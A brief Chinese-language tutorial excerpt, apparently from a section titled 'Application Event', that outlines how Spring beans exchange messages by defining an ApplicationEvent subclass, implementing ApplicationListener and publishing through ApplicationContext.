    10.1 Application Event Spring使用Application Event给bean之间的消息通讯提供了手段 应按照如下部分实现bean之间的消息通讯 继承ApplicationEvent类实现自己的事件 实现继承ApplicationListener接口实现监听事件 使用ApplicationContext发布消息
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他